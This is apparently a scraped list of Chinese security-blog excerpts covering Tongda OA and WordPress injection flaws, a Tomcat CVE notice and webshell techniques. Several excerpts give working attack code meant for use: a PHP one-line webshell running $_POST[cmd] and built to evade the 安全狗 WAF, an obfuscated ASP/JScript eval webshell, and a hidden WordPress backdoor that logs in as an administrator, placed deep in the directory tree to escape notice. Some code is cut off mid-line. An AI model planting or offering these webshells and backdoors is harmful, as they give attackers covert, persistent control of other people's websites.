通达oa前台注入+后台getshell

注入分析\inc\common.inc.php<?php function SecureRequest(&$var) {     if (is_array($var)) {         foreach ($var as $_k => $_v ) { &n

WordPress REST API 内容注入漏洞

1.漏洞信息:WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统。在4.7.0版本后,REST API插件的功能被集成到WordPress中,由此也引发了一些安全性问题。近日,一个由REST API引起的影响WorePress4.7.0和4.7.1版本的漏洞被披露,该漏洞可以导致WordPress所有文章内容可以未经验证被查看,修改,删除,甚至创建新的文章,危害巨大。2.漏洞影响版本:WordPress 4.7.0 WordPress 4.7.13.复现环境:A

最新过狗一句话

无聊写了个简单但是安全狗查不出的一句话后门
:/

文件名:assert.php
代码:

<?php
${"function"}=substr(__FILE__,-10,-4);;
${"command"}=$_POST[cmd];
$function($command);


ASP一句话也可以奇葩

       大家都造PHP千变万化,从变量,数组,赋值,运算,函数等。。。没有一样不奇葩的!所以常说PHP的木马永远杀不干净。

        但是asp就悲剧了,它的脚本VBS用法很死板,不像PHP语法各种灵活和奇葩,不过别忘了asp是可以自定义脚本的,如果改成Javascript脚本来执行代码,也能像PHP木马一样奇葩

下面分享一下偶的一匹悍马
<%@LANGUAGE="javascript"%>
<%_()(_(!-''));function _(__){if(__){return Request('_')+''}else{return  eval
}}
%>

IoTSeeker:物联网设备默认密码扫描检测工具

14828134627729.jpg

猥琐的wordpress后门

一个可以自动调用管理员帐号登录wordpress后台的方法。
<?php

    require('../../../wp-blog-header.php'); //我基本都是放到3级目录下。也可以放到根目录,但是容易被发现。
    $query_str = "SELECT ID FROM $wpdb->users";
    $user_ids = $wpdb->get_results($query_str);
    foreach ($user_ids as $uid) {
        $user_id = $uid->ID;
        if (user_can($user_id, 'administrator')) {
            $user_info = get_userdata($user_id);
            $user_login = $user_info->user_login;
            wp_set_current_user($user_id, $user_login);


改包上传 绕过安全狗

03.png

快速一句话爆破Python脚本

# set url,shell_type,dic filename
url = "http://172.16.18.2:8666/luan.asp"
shell_type = "asp"
dic_filename = "WebshellPassword.tx

Apache Tomcat再曝远程代码执行(CVE-2016-8735)

时隔十月发布的CVE-2016-5425 Apache Tomcat本地提权漏洞预警不久,近日Apache Tomcat又被爆出存在远程代码执行漏洞(CVE-2016-8735)。

Tomcat是运行在Apache上的应用服务器,支持运行Servlet/JSP应用程序的容器——Tomcat可看作是Apache的扩展,不过实际上Tomcat也可以独立于Apache运行。

tomcat.jpg    


assert免杀一句话

0x00 eval和assert的区别

http://www.vuln.cn/8395
http://www.php.net/manual/zh/function.eval.php
http://php.net/manual/zh/functions.variable-functions.php

1)assert是函数,eval不是函数,是语言构造器
2)eval($a)中$a只能是字符串,assert($a)中$a可以是php代码,也可以是php代码的字符串,assert($a)的$a如果是字符串形式不能有2个以上的
分号,如果有2个以上的分号只执行到第一个,使用assert来执行多条php语句可借助eval来实现.